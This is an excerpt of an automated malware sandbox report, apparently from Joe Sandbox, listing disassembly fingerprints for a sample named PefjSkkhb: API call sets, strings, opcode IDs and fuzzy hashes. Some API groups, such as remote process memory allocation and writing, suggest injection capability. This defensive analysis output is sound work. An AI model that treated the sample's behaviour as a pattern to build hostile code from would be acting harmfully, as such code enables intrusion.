                                                                      • ~SyncLockT.VCCORLIB ref: 00007FF7C0ED005E
                                                                        • Part of subcall function 00007FF7C0ECF7B8: CloseHandle.KERNEL32(?,?,?,00007FF7C0ED0063,?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ECF7C9
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED006A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3142591903-0
                                                                      • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                      • Instruction ID: debebd88ee926c97e68e05484dc8ff3ac75712c13a5d62b2aab0c1d01220c8a8
                                                                      • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                      • Instruction Fuzzy Hash: 89014C3AA18B41D6E741EF15E44022EB360FB88B64F944431DB8D83B55CF3CE492C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction ID: 148e3de9af79d6ee44703581a5d4b5b16290bb5a0dc6dd1a82ebb7066d36db66
                                                                      • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction Fuzzy Hash: 56015E2190CA4381F7557F50A984735A761BF05BB4F984934CD1D863A0CFBDB0D583A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorExitLastThread
                                                                      • String ID:
                                                                      • API String ID: 1611280651-0
                                                                      • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                      • Instruction ID: e006024a1d837dae0727ce351bbe9c9412191540980b5100b27dd227eb3ae6d4
                                                                      • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                      • Instruction Fuzzy Hash: 8A012C21B08A8692EB157F24954823CA265FF40F79F901734C63E827D5DF7CB8988390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction ID: 9ddcab31ebb658d7f67aac314c092c77c4e93767206f8faa09f817037f1d349f
                                                                      • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction Fuzzy Hash: 5DF03014F5C71282FB193FB5684827A93527F88B65FC45030CD1A92352DFAEB4D546A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction ID: e4a8f70f9a17e13bd181a85b0de27fb2c7271ca4c590a5e0be5b972ae6af4d96
                                                                      • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction Fuzzy Hash: 01F03010F5C71242FB553F76A84827692527F48B69FC45030C90A92352DFAEB4D646E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 948891078-24824748
                                                                      • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction ID: ffd4e7d3fa4b552934b3e6a56028aec7d06797def8234cc288f63cc6943e9a10
                                                                      • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction Fuzzy Hash: EED1B572B58B5681EB10FF25D4902ADA760FB80B98F805431EE4E87B65EF3CE545C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 3769357847-24824748
                                                                      • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                      • Instruction ID: eaf7c9e3b04ad3bac2898ebaa543fea1e910e39f8d2b11de8546bafa56ebd979
                                                                      • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                      • Instruction Fuzzy Hash: BFD16C36B48B5685EB10FF66D0802AD77B4FB48B98B884432DE4D87BA5DF39E445C390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                      • API String ID: 3215553584-1196891531
                                                                      • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                      • Instruction ID: 5bfdbcf9921fbd2f0808dbebf0b143690756fabbc2ecd21530dcc1be8cbbf553
                                                                      • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                      • Instruction Fuzzy Hash: 5B81C272E8D2028EFB647F1696443BDA6E0AF11764FC48035DA0ED3791DB2EF850D2A1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction ID: e3b74644c1d058b8d15ba65488878f64796e245b75eb6f590fc50251dd3b9edd
                                                                      • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction Fuzzy Hash: 1161647298D2429AE765BF2C805C37CB7A0EB45B28F941135D64AC5399CF6CF481CFA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$acos
                                                                      • API String ID: 1156100317-2870037509
                                                                      • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction ID: f4e42d1382cfbd67927e4f905e7418f189ef9f567b0fb7af1158045862390f30
                                                                      • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction Fuzzy Hash: A361B821D2CF8584E223AF385861276D758BFA63E4F918336E91EB5B64DF1CB0824790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$asin
                                                                      • API String ID: 1156100317-2188059690
                                                                      • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction ID: cb4e5b9d67f5b4d746432695d59ca301a269af733d2134e4fc8bb4b955090d87
                                                                      • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction Fuzzy Hash: 1C61A621D1CF8185E253AF389811376D758BF963E4F908332E96EB5B65DF2CB0824790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction ID: 3894e7019747b6ccea7143c8650f8248db0879bea6027dc24e162f9abf2f5932
                                                                      • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction Fuzzy Hash: B551C27661868182D720EF52E4855AEFB60F7C8BA4F801135EE4E93B45DF7CE505CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: P
                                                                      • API String ID: 135850232-3110715001
                                                                      • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction ID: c2897fd9eb71ba23fd55493ba322b6073f68f9abd5e23bd91d259aea27c42dbc
                                                                      • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction Fuzzy Hash: DC41D522A44A9182EB21FF15C4443A9A760FB84FB4F998231EA2D837D1DF39F442C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                      • String ID: U
                                                                      • API String ID: 2456169464-4171548499
                                                                      • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction ID: a2562f8d84a4c134c28d70d3e56a241387db4cbbf48cdf38e2377958d3011002
                                                                      • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction Fuzzy Hash: C841A722B1DA8182EB20AF15E4443BAB7A1F788BA4F804131EE4EC7758DF7CE441C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction ID: 8ad255b7a470db96e3fa853a692fdee17370aac8844593710744b0943bf65a76
                                                                      • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction Fuzzy Hash: BE416E326097918AE770EF18E444B9AB3A1F784764F544335DAA843B99CF3CE885CF90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2671490118-1439706946
                                                                      • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction ID: 91b65266c9fd07d113b1a0ba49b89caadefe2ce9d5ca5d246ce130cb04ae99a4
                                                                      • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction Fuzzy Hash: E4417F326086C1CBE730DF15E444B5AF7A0F7887A4F904225EA9947B98DF3CE4858F40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 1752125012-2298589950
                                                                      • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction ID: bb89ec28c81fa6adb093d74302b75768382971634f8d27915f2a5033f59f77a9
                                                                      • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction Fuzzy Hash: 9F31C432A1CB8186EB20EF55E4403AAB360FBC4BA5F908136DA8D83B54CF3CE445CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                      • String ID: Listbox
                                                                      • API String ID: 3747482310-2633736733
                                                                      • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction ID: 8e68f4de5da35f6ec9f6c1cc3f3e02841aa5e781309568449c7dd3c373126c13
                                                                      • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction Fuzzy Hash: 25313B366097C1C6E770DF15B444A5AB7A1F7887A4F908225EEA903B98CB3DE481CF50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
